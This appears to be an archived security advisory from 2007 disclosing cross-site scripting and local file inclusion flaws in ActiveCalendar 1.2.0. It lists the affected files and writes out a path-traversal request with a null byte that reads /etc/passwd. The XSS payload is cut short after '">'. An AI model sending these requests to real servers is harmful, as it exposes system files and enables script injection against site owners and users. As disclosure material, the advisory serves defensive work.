AOH :: HP Unsorted A :: C07-2460.HTM

ActiveCalendar 1.2.0, Multiple vulnerabilities



ActiveCalendar 1.2.0, Multiple vulnerabilities
ActiveCalendar 1.2.0, Multiple vulnerabilities



ActiveCalendar 1.2.0, Multiple vulnerabilities
Vendor site : http://www.micronetwork.de/activecalendar/ 
Global risk : Critical

Multiples XSS :
---------------

/activecalendar/data/[page].php?css=">

In :

/data/
flatevents.php
js.php
mysqlevents.php
m_2.php
m_3.php
m_4.php
xmlevents.php
y_2.php
y_3.php


Local File Include :
---------------------

/activecalendar/data/showcode.php?page=../../../../../../../../../../../../../../etc/passwd%00


Regards,


Simon Bonnard - 24/02/07 - 02:40am
                                       

The entire AOH site is optimized to look best in Firefox® 3 on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2014 AOH
We do not send spam. If you have received spam bearing an artofhacking.com email address, please forward it with full headers to abuse@artofhacking.com.